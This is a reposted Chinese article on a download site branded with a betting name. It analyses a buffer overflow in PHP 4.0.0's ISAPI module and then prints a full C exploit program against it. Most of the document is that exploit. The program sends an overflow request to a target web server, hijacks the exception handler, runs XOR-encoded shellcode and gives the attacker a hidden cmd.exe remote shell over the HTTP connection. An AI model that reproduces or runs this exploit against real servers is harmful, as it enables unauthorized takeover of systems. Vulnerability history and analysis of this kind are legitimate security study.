365bet备用网址:请安心下载,绿色无病毒!

www.365bet.com最近更新热门排行
您现在的位置:首页››软件教程››编程开发››编程其它››PHP开发工具

php4.0.0远程溢出源代码分析与测试程序

2006-03-28 12:09作者:佚名来源:本站整理浏览:389 评论:0
php4.0.0才出来的时候,我们测试发现php4isasp.dll有缓冲溢出漏洞,下面是php4isapi.c的相关源代码:

static void sapi_isapi_register_server_variables(zval *track_vars_array ELS_DC SLS_DC PLS_DC)
{
char static_variable_buf[ISAPI_SERVER_VAR_BUF_SIZE];
char *variable_buf;
DWORD variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
char *variable;
char *strtok_buf = NULL;
LPEXTENSION_CONTROL_BLOCK lpECB;
char **p = isapi_server_variables;

lpECB = (LPEXTENSION_CONTROL_BLOCK) SG(server_context);

/* Register the standard ISAPI variables */
while (*p) {
 variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
 if (lpECB->GetServerVariable(lpECB->ConnID, *p, static_variable_buf, &variable_len)
  && static_variable_buf[0]) {
  php_register_variable(*p, static_variable_buf, track_vars_array ELS_CC PLS_CC);
 } else if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
  variable_buf = (char *) emalloc(variable_len);
  if (lpECB->GetServerVariable(lpECB->ConnID, *p, variable_buf, &variable_len)
   && variable_buf[0]) {
   php_register_variable(*p, variable_buf, track_vars_array ELS_CC PLS_CC);
  }
  efree(variable_buf);
 }
 p++;
}

/* PHP_SELF support */
#ifdef WITH_ZEUS
if (lpECB->GetServerVariable(lpECB->ConnID, "PATH_INFO", static_variable_buf, &variable_len)
#else
if (lpECB->GetServerVariable(lpECB->ConnID, "SCRIPT_NAME", static_variable_buf, &variable_len)

/*  php4.0.0漏洞所在地,缓冲溢出。此时的variable_len变量已经是上次调用GetServerVariable 的返回变量  */
/*  php4.0.3 已经修补  */

#endif
 && static_variable_buf[0]) {
 php_register_variable("PHP_SELF", static_variable_buf, track_vars_array ELS_CC PLS_CC);

/*
  因为形参被覆盖,而这形参又很难伪造,所以传统的溢出攻击因为这个调用不能返回而无效
  但我们可以使用异常结构攻击,可以参见我的相关的文章
*/


}

/* Register the internal bits of ALL_HTTP */

variable_len = ISAPI_SERVER_VAR_BUF_SIZE;

if (lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", static_variable_buf, &variable_len)) {
 variable_buf = static_variable_buf;
} else {
 if (GetLastError()==ERROR_INSUFFICIENT_BUFFER) {
  variable_buf = (char *) emalloc(variable_len);
  if (!lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", variable_buf, &variable_len)) {
   efree(variable_buf);
   return;
  }
 } else {
  return;
 }
}
variable = php_strtok_r(variable_buf, "", &strtok_buf);
while (variable) {
 char *colon = strchr(variable, ':');

 if (colon) {
  char *value = colon+1;

  while (*value==' ') {
   value++;
  }
  *colon = 0;
  php_register_variable(variable, value, track_vars_array ELS_CC PLS_CC);
  *colon = ':';
 }
 variable = php_strtok_r(NULL, "", &strtok_buf);
}
if (variable_buf!=static_variable_buf) {
 efree(variable_buf);
}
}

   因为形参的问题,采用的覆盖异常处理结构的办法使得shellcode代码得到控制。但因为异常结构代码相对不统一,可能需要根据被攻击系统的WINDOWS版本调整相关参数。具体攻击测试代码:

/*  
    php4.0  overflow program phphack.c ver 1.0
    copy by yuange <yuange@163.net>  2000。08。16

*/  

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
// #define  DEBUG

//#define  RETEIPADDR  eipwin2000
#define  FNENDLONG   0x08
#define  NOPCODE     'B'    // INC EDX    0x90
#define  NOPLONG     0x3c
#define  BUFFSIZE    0x20000



#define  RETEIPADDRESS 0x900+4
#define  SHELLBUFFSIZE 0x800
#define  SHELLFNNUMS   9
#define  DATAXORCODE   0xAA
#define  LOCKBIGNUM    19999999
#define  LOCKBIGNUM2   13579139

#define  SHELLPORT   0x1f90   //0x1f90=8080
#define  WEBPORT     80  

void     shellcodefnlock();
void     shellcodefn(char *ecb);

void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

int main(int argc, char **argv)
{
 char *server;
 char *str="LoadLibraryA""x0""CreatePipe""x0"
      "CreateProcessA""x0""CloseHandle""x0"
      "PeekNamedPipe""x0"
      "ReadFile""x0""WriteFile""x0"
      "Sleep""x0"
      "cmd.exe""x0""x0dx0a""exit""x0dx0a""x0"
      "XORDATA""x0"
      "strend";
 char buff1[]="GET /default.htmp4";
 char buff2[]=" HTTP/1.1 HOST:";
 char *fnendstr="x90x90x90x90x90x90x90x90x90";
 char SRLF[]="x0dx0ax00x00";  

 
 char  eipjmpesp[]   ="xb7x0exfax7f";
// push esp
// ret
 char  eipexcept[]="xb8x0exfax7F";
// ret
 char  eipjmpesi[]="x08x88xfax7F";  
 char  eipjmpedi[]="xbex8bxfax7F";  
 char  eipjmpebx[]="x73x67xfax7F";  
//  push ebx
//  ret
/*
  jmp ebx功能代码地址, 中文WINNT、中文WIN2000此地址固定
  这是处于c_936.nls模块
  win2000发生异常调用异常处理结构代码时ebx指向异常结构。winnt老版本是esi,可用7ffa8808,后面版本是edi,可用7ffa8bbe。    
*/

 char    buff[BUFFSIZE];
 char    recvbuff[BUFFSIZE];
 char    shellcodebuff[0x1000];
 struct  sockaddr_in s_in2,s_in3;
 struct  hostent *he;
 char    *shellcodefnadd,*chkespadd;
 unsigned  int sendpacketlong;
//  unsigned
 int i,j,k;
 unsigned  char temp;
 int     fd;
 u_short port,port1,shellcodeport;
 SOCKET  d_ip;
 WSADATA wsaData;
 int offset=0;
 int xordatabegin;
 int  lockintvar1,lockintvar2;
 char lockcharvar;
 int OVERADD=RETEIPADDRESS;
 int result;

 fprintf(stderr," PHP4.0 FOR WIN32 OVERFLOW PROGRAM 2.0 .");
 fprintf(stderr," copy by yuange 2000.8.16.");
 fprintf(stderr," wellcome to my homepage http://yuange.yeah.net .");
 fprintf(stderr," welcome  to http://www.nsfocus.com .");
 fprintf(stderr," usage: %s <server> [webport] ", argv[0]);

 
 if(argc <2){
     fprintf(stderr," please enter the web server:");
     gets(recvbuff);
     for(i=0;i<strlen(recvbuff);++i){
\t if(recvbuff!=' ') break;
     }

     server=recvbuff;
     if(i<strlen(recvbuff)) server+=i;
/*
     fprintf(stderr," please enter the offset(0-3):");
     gets(buff);
     for(i=0;i<strlen(buff);++i){
\t  if(buff!=' ') break;
     }
     offset=atoi(buff+i);      
*/
   }


 result= WSAStartup(MAKEWORD(1, 1), &wsaData);
 if (result != 0) {
\tfprintf(stderr, "Your computer was not connected "
\t    "to the Internet at the time that "
\t    "this program was launched, or you "
\t    "do not have a 32-bit "
\t    "connection to the Internet.");
\texit(1);
   }

/*
 if(argc>2){
  offset=atoi(argv[2]);
 }
 OVERADD+=offset;
 if(offset<0||offset>3){
    fprintf(stderr," offset error !offset  0 - 3 .");
    gets(buff);
    exit(1);
 }

 */
 


 if(argc <2){
 //     WSACleanup( );    
//       exit(1);
 }
 else  server = argv[1];

 for(i=0;i<strlen(server);++i){
    if(server!=' ')
    break;
 }
 if(i<strlen(server)) server+=i;

 for(i=0;i+3<strlen(server);++i){
     
     if(server==':'){
\t  if(server[i+1]=='\'||server[i+1]=='/'){
\t      if(server[i+2]=='\'||server[i+2]=='/'){
\t\t  server+=i;
\t\t  server+=3;
\t\t  break;
\t      }
\t  }
     }
 }
 for(i=1;i<=strlen(server);++i){
     if(server[i-1]=='\'||server[i-1]=='/') server[i-1]=0;
 }

 d_ip = inet_addr(server);
 if(d_ip==-1){
    he = gethostbyname(server);
    if(!he)
    {
      WSACleanup( );
      printf(" Can't get the ip of %s !",server);
      gets(buff);
      exit(1);    
    }
    else    memcpy(&d_ip, he->h_addr, 4);
 }    
 
 if(argc>2) port=atoi(argv[2]);
 else   port=WEBPORT;
 if(port==0) port=WEBPORT;

 fd = socket(AF_INET, SOCK_STREAM,0);
 i=8000;
 setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
\t
 s_in3.sin_family = AF_INET;
 s_in3.sin_port = htons(port);
 s_in3.sin_addr.s_addr = d_ip;
 printf(" nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
 
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
{\t
    closesocket(fd);
    WSACleanup( );
    fprintf(stderr,"  connect err.");
    gets(buff);
    exit(1);
}
 
 _asm{
\t mov ESI,ESP
\t cmp ESI,ESP
 }
 _chkesp();
 chkespadd=_chkesp;
 temp=*chkespadd;
 if(temp==0xe9) {
\t ++chkespadd;
\t i=*(int*)chkespadd;
\t chkespadd+=i;
\t chkespadd+=4;
 }

 shellcodefnadd=shellcodefnlock;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
\t ++shellcodefnadd;
\t k=*(int *)shellcodefnadd;
\t shellcodefnadd+=k;
\t shellcodefnadd+=4;
 }

 for(k=0;k<=0x500;++k){
\t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }
 memset(buff,NOPCODE,BUFFSIZE);
 if(argc>4){
    memcpy(buff,argv[4],strlen(argv[4]));
 }
 else  memcpy(buff,buff1,strlen(buff1));
 // strcpy(buff,buff1);
// memset(buff+strlen(buff),NOPCODE,1);

   memcpy(buff+OVERADD+0x60+NOPLONG,shellcodefnadd+k+4,0x80);
//  memcpy(buff+NOPLONG,shellcodefnadd+k+4,0x80);
   
 shellcodefnadd=shellcodefn;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
\t  ++shellcodefnadd;
\t k=*(int *)shellcodefnadd;
\t shellcodefnadd+=k;
\t shellcodefnadd+=4;
 }
 

 for(k=0;k<=0x1000;++k){
\t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }

 memcpy(shellcodebuff,shellcodefnadd,k);   //j);
 cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 for(i=0;i<0x400;++i){
     if(memcmp(str+i,"strend",6)==0) break;
 }    
 memcpy(shellcodebuff+k,str,i);


 sendpacketlong=k+i;
 for(k=0;k<=0x200;++k){
\t if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

//\t if(memcmp(buff+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

 }

 
 
 
 for(i=0;i<sendpacketlong;++i){
\t temp=shellcodebuff;
\t temp^=DATAXORCODE;
\t if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\'||temp=='0'||temp=='?'||temp=='%'){
\t   buff[OVERADD+NOPLONG+k]='0';

   //       buff[NOPLONG+k]='0';
\t   ++k;
\t   temp+=0x40;
\t }
\t  buff[OVERADD+NOPLONG+k]=temp;

    //    buff[NOPLONG+k]=temp;
\t ++k;
}

 

//  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
//  k+=sendpacketlong;


/*
 for(i=-0x30;i<0x30;i+=4){
   memcpy(buff+OVERADD+i,eipexcept,4);
 }
 memcpy(buff+OVERADD+i,eipjmpesp,4);
*/
 for(i=-40;i<0x40;i+=8){
    memcpy(buff+OVERADD+i,"x42x42x42x2D",4);
    memcpy(buff+OVERADD+i+4,eipjmpebx,4);
 }
 memcpy(buff+OVERADD+i+8,"x42x42x42x42x61x61x61x61x61x61x61x61x61x61x61x61x5bxffx63x64x42x42x42x42",24);



//  fprintf(stderr," offset:%d",offset);



  /*

 192.168.8.48
 if(argc>2){
     server=argv[2];
     if(strcmp(server,"win9x")==0){
\t  memcpy(buff+OVERADD,eipwin9x,4);
\t  fprintf(stderr," nuke win9x.");
     }
     if(strcmp(server,"winnt")==0){
\t  memcpy(buff+OVERADD,eipwinnt,4);
\t  fprintf(stderr," nuke winnt.");
     }
     
 }

*/

 sendpacketlong=k+OVERADD+i+NOPLONG;
//sendpacketlong=k+NOPLONG;

strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);

 sendpacketlong=strlen(buff);
// buff[sendpacketlong]=0x90;
strcpy(buff+sendpacketlong,"");
/*
buff[sendpacketlong]=0x90;
for(i=-0x30;i<0x30;i+=4){
   memcpy(buff+sendpacketlong+OVERADD+i,eipexcept,4);
 }
 memcpy(buff+sendpacketlong+OVERADD+i,eipwinnt,4);

 strcpy(buff+sendpacketlong+OVERADD+i+4,"xffx63x64");
 
 strcpy(buff+sendpacketlong+OVERADD+i+20,"");
*/

// printf(" send buff:%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
 sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
 _asm{
     lea esp,buff
\tadd esp,OVERADD
     ret

 }
#endif

*/
 if(argc>6) {
     if(strcmp(argv[6],"debug")==0)     {
\t    _asm{
\t     lea esp,buff
\t     add esp,OVERADD
\t     ret
\t    }
     }
 }



 xordatabegin=0;
 for(i=0;i<1;++i){
    j=sendpacketlong;
    fprintf(stderr," send  packet %d bytes.",j);
//     fprintf(stderr," sned:%s ",buff);
    send(fd,buff,j,0);
    k=recv(fd,recvbuff,0x1000,0);
    if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
\t  xordatabegin=1;
\t  k=-1;
\t  fprintf(stderr," ok!");
    }
    if(k>0){
\t recvbuff[k]=0;
\t fprintf(stderr,"  recv: %s",recvbuff);
    }

 }

 k=1;
 ioctlsocket(fd, FIONBIO, &k);

// fprintf(stderr," now begin: ");

 lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
 lockintvar2=lockintvar1;


/*
 for(i=0;i<strlen(SRLF);++i){
\t  SRLF^=DATAXORCODE;
 }
 send(fd,SRLF,strlen(SRLF),0);
 send(fd,SRLF,strlen(SRLF),0);
 send(fd,SRLF,strlen(SRLF),0);
*/
 k=1;
 while(k!=0){
     if(k<0){
\t  gets(buff);
\t  k=strlen(buff);
\t  memcpy(buff+k,SRLF,3);
   //      send(fd,SRLF,strlen(SRLF),0);
   //      fprintf(stderr,"%s",buff);
\t  for(i=0;i<k+2;++i){
\t\tlockintvar2=lockintvar2*0x100;
\t\tlockintvar2=lockintvar2%LOCKBIGNUM;
\t\tlockcharvar=lockintvar2%0x100;
\t\tbuff^=lockcharvar;   // DATAXORCODE;
//\t      buff^=DATAXORCODE;
\t  }
\t     send(fd,buff,k+2,0);
//\t  send(fd,SRLF,strlen(SRLF),0);
     }
     k=recv(fd,buff,0x1000,0);
     if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0) {
\t  xordatabegin=1;
\t  k=-1;
     }

     if(k>0){
//\t  fprintf(stderr,"recv %d bytes",k);
\t  if(xordatabegin==1){
\t      for(i=0;i<k;++i){
\t\tlockintvar1=lockintvar1*0x100;
\t\tlockintvar1=lockintvar1%LOCKBIGNUM;
\t\tlockcharvar=lockintvar1%0x100;
\t\tbuff^=lockcharvar;   // DATAXORCODE;
\t      }
\t  }
\t  buff[k]=0;
\t  fprintf(stderr,"%s",buff);
     }
//      if(k==0) break;
 }  
 closesocket(fd);
 WSACleanup( );
 fprintf(stderr," the server close connect.");
 gets(buff);
 return(0);
}
void  shellcodefnlock()
{
      _asm{
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      _emit('.')

\t      _emit('p')
\t      _emit('h')
\t      _emit('p')
\t      _emit('4')
\t      _emit('?')


\t      jmp   next
getediadd:      pop   EDI
\t      push  EDI
\t      pop   ESI
\t      push  ebx    //  ecb
\t      push  ebx\t       //  call shellcodefn ret address
\t      xor   ecx,ecx
looplock:     lodsb
\t      cmp  al,cl
\t      jz   shell
\t      cmp  al,0x30
\t      jz   clean0
sto:\t  xor  al,DATAXORCODE
\t      stosb
\t      jmp  looplock
clean0:       lodsb
\t      sub al,0x40
\t      jmp sto
next:\t call  getediadd
shell:\t   NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      
   }
}\t

void shellcodefn(char *ecb)
{    char\tBuff[SHELLBUFFSIZE+2];
   int\t *except[2];


   FARPROC     Sleepadd;
   FARPROC     WriteFileadd;
   FARPROC     ReadFileadd;
   FARPROC     PeekNamedPipeadd;
   FARPROC     CloseHandleadd;
   FARPROC     CreateProcessadd;
   FARPROC     CreatePipeadd;
   FARPROC\tprocloadlib;

   FARPROC     apifnadd[1];
   FARPROC     procgetadd=0;
   FARPROC     writeclient= *(int *)(ecb+0x84);
   FARPROC     readclient = *(int *)(ecb+0x88);
   HCONN       ConnID     = *(int *)(ecb+8) ;
   char\t*stradd;
   int\t imgbase,fnbase,k,l;
   HANDLE      libhandle;   //libwsock32;  
   STARTUPINFO siinfo;

   PROCESS_INFORMATION ProcessInformation;
   HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
   int\t lBytesRead;
   int  lockintvar1,lockintvar2;
   char lockcharvar;

   
   
   SECURITY_ATTRIBUTES sa;
   _asm {\t    jmp    nextcall
\t getstradd:   pop    stradd
\t\t      lea    EDI,except
\t\t      mov    dword ptr FS:[0],EDI
   }
      except[0]=0xffffffff;
      except[1]=stradd-0x07;

      imgbase=0x77e00000;
      _asm{
\t  call getexceptretadd
      }
      for(;imgbase<0xbffa0000,procgetadd==0;){
\t    imgbase+=0x10000;
\t    if(imgbase==0x78000000) imgbase=0xbff00000;
\t    if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
\t\t   fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
\t\t   k=*(int *)(fnbase+0xc)+imgbase;
\t\t   if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
\t\t      libhandle=imgbase;
\t\t      k=imgbase+*(int *)(fnbase+0x20);
\t\t      for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
\t\t\tif(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor')
\t\t\t{
\t\t\t   k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
\t\t\t   k+=*(int *)(fnbase+0x10)-1;
\t\t\t   k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
\t\t\t   procgetadd=k+imgbase;
\t\t\t   break;
\t\t\t}
\t\t      }
\t\t   }
\t    }
\t  }
//搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
//注意这儿处理了搜索页面不在情况。

\tif(procgetadd==0) goto  die ;

\t    for(k=1;k<SHELLFNNUMS;++k) {
\t\tapifnadd[k]=procgetadd(libhandle,stradd);
\t\tfor(;;++stradd){
\t\t if(*(stradd)==0&&*(stradd+1)!=0) break;
\t\t}
\t\t++stradd;
\t    }

\t    sa.nLength=12;
\t    sa.lpSecurityDescriptor=0;
\t    sa.bInheritHandle=TRUE;

\t    CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
\t    CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);


// ZeroMemory(&siinfo,sizeof(siinfo));
\t    _asm{
\t\t lea EDI,siinfo
\t\txor eax,eax
\t\tmov ecx,0x11
\t\trepnz stosd
\t    }
   siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
   siinfo.wShowWindow = SW_HIDE;
   siinfo.hStdInput = hReadPipe2;
   siinfo.hStdOutput=hWritePipe1;
   siinfo.hStdError =hWritePipe1;
   k=0;
//    while(k==0)
//   {
\tk=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
\tstradd+=8;
//    }    
   PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
   k=8;
   writeclient(ConnID,stradd+9,&k,0);

   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;

   
   while(1) {
\tPeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
\tif(lBytesRead>0) {
\t   ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
\t   if(lBytesRead>0) {
\t       for(k=0;k<lBytesRead;++k){
\t\tlockintvar2=lockintvar2*0x100;
\t\tlockintvar2=lockintvar2%LOCKBIGNUM;
\t\tlockcharvar=lockintvar2%0x100;
\t\tBuff[k]^=lockcharvar;   // DATAXORCODE;
//\t\tBuff[k]^=DATAXORCODE;
\t       }
\t       writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
\t   }
\t}
\telse{
\t      lBytesRead=SHELLBUFFSIZE;
\t      k=readclient(ConnID,Buff,&lBytesRead);
\t      if(k!=1){
\t\tk=8;
\t\tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
\t\tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
\t\tWriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
\t\twhile(1){
\t\t  Sleepadd(0x7fffffff);\t\t  //僵死  
\t\t}    
\t    
\t      }
\t      else{
\t\tfor(k=0;k<lBytesRead;++k){
\t\t  lockintvar1=lockintvar1*0x100;
\t\t  lockintvar1=lockintvar1%LOCKBIGNUM;
\t\t  lockcharvar=lockintvar1%0x100;
\t\t  Buff[k]^=lockcharvar;   // DATAXORCODE;
//\t\t Buff[k]^=DATAXORCODE;
\t\t}
\t\tWriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
//\t     Sleepadd(1000);
\t      }
\t}
   }
   
   die: goto die  ;
\t_asm{

getexceptretadd:   pop  eax
\t\t   push eax
\t\t   mov  edi,dword ptr [stradd]
\t\t   mov dword ptr [edi-0x0e],eax
\t\t   ret
errprogram:\t   mov eax,dword ptr [esp+0x0c]
\t\t   add eax,0xb8
\t\t   mov dword ptr [eax],0x11223344  //stradd-0xe
\t\t   xor eax,eax\t\t//2
\t\t   ret\t\t\t//1
execptprogram:     jmp errprogram\t    //2 bytes     stradd-7
nextcall:\t  call getstradd\t    //5 bytes
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t\t   NOP
\t}\t
}



void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
  int i,k;
  unsigned char temp;
  char *calladd;

  for(i=0;i<len;++i){
      temp=shellbuff;
      if(temp==0xe8){
\t k=*(int *)(shellbuff+i+1);
\t calladd=fnadd;
\t calladd+=k;
\t calladd+=i;
\t calladd+=5;
\t if(calladd==chkesp){
\t     shellbuff=0x90;
\t     shellbuff[i+1]=0x43;   // inc ebx
\t     shellbuff[i+2]=0x4b;    // dec ebx
\t     shellbuff[i+3]=0x43;
\t     shellbuff[i+4]=0x4b;
\t }
      }
  }
}
Tags:责任编辑:cvery
顶一下(59)
92.19%
    1. 远程桌面软件远程桌面软件

      365bet备用网址远程桌面365bet备用网址专区提供了最好用最全面的远程桌面连接软件和MAC远程桌面软件免费下载。

    1. 远程控制软件远程控制软件

      本文提供国内外各种远程控制软件,远程控制电脑以及远程控制软件破解版的下载。

    文章评论 365bet下载QQ群:① 7551827使用手机微信搜索 微信号:xinyunshouyou 关注我们 有更多惊喜!!

    请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!
      验证码:     登录   注册
    网友评论